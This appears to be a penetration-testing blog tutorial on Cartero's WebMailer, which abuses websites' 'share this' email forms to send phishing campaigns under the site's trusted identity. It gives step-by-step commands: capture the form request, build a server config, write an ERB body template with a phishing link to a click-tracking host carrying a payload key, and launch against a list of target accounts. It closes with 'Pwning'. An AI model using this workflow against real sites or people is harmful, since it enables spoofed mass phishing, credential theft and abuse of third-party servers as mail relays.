Cartero — Automating Phishing Mail <Forms> requests
Many websites [un]willingly allow users to send emails through a simple web request. Knowing this we can automate phishing campaigns with Cartero exploiting the vulnerable web forms to send emails.
While performing WebApp penetration tests, more than one of us have come across those “share this” buttons that generate a mail form allowing users to share data. With some digging around plenty actually give attackers enough variables to send arbitrary emails using the websites’s as a source.
After one engagement where that was useful. I always kept a little script hanging around that would easily allow me to send emails that way. One thing left to the other and Cartero Framework, ended up having a reincarnation of it.
In any case, these requests, sometimes do come handy, because servers do not block or even check emails coming from those servers, since they “should” be trusted and they are used internally.
Cartero WebMailer
Let us discuss the process to setup and launch an attack using Cartero’s WebMail command, using the freely available send-email.com mail service as an example. Note: This is not a vulnerable url, but it will serve as a good example to show the process.
—[ Step 1: Obtain webmail POST/GET request
Once we have found a vulnerable site, it is time — with the help of chrome dev tools, burp or any other tool capable of showing us the request — to copy the request and use it to extract the information.
Note: This could also easily be copied using Burp or any other proxy.
—[ Step 2: Create a webmail server config
In order to generate a server configuration out of the data we just obtained, let us create one using the Server command on Cartero.
❯❯❯ ./cartero Server --add webmail -T webmailThis will create and we can populate it as it is shown below; making all the necessary changes, add any cookies, and special headers needed on the request.
—[ Step 3: Generating a body payload
Now it is time to take your email and make into a template. For people familiarized with ERB, this should be easy.
❯❯❯ cat sample.web _token=WYEwpMnaU5GRKumTpYiRna6W7XixoMgygH8wXfHu&emailTo=<%= ERB::Util::url_encode self[:email] %>&replyTo=<%= ERB::Util::url_encode self[:reply_to] %>&subject=This+is+a+test+<%= ERB::Util::url_encode self[:name] %>&message=Hola+<%= ERB::Util::url_encode self[:name] %>%2C%0D%0AThis+email+needs+to+be+displayed+as+HTML.+This+is+an+automated+email+to+your+email+<%= ERB::Util::url_encode self[:email] %>.+In+addition%2C+this+email+can+also+be+displayed+securely+on+http://192.168.1.216:8080/click?key=<%= ERB::Util::url_encode self[:payload] %>— [ Step 4: Launch the Attack
Testing the command, will provide us with a useful help
❯❯❯ ./cartero WebMailer
Usage: Cartero WebMailer [options]
-R, --raw [RAW_REQUEST_FILE] Sets WebMail Raw Request
-S, --server [SERVER_NAME] Sets WebMail server to use
-U, --url [URL:PORT] Sets WebMail server url to use
-H [HEADER:VAL\nHEADER:VAL], Sets WebMail Headers to use
--headers
-C, --cookies [COOKIES] Sets WebMail Cookies to use
-D, --data [DATA_FILE] File containing template data sets
-s, --subject [EMAIL_SUBJECT] Sets Email subject
-f, --from [EMAIL_FROM] Sets Email from
-r, --reply-to [EMAIL_REPLY_TO] Sets Email reply-to
-b, --body [REQUEST_FILE_PATH] Sets Email Text request query Body
-p [PORT_1,PORT_2,..,PORT_N], Sets Email Payload Ports to scan
--portsCommon options:
-h, --help Show this message
--list-options Show list of available options
Now using our usual sample.json datasets, we launch the attack as follows:
❯❯❯ ./cartero WebMailer -D accounts.json -b sample.web -S webmail- -D , is the dataset containing the people you want to send the email to and any other data you want to auto-populate on your email templates.
- -b , it is the template body you want to use, which is the actual query-string POST or GET you will be sending the servers to create the emails, as we showed above.
- -S , the server template containing the server configuration
— [ Step 5: Pwning
Sit back, relax and Enjoy your … 😃
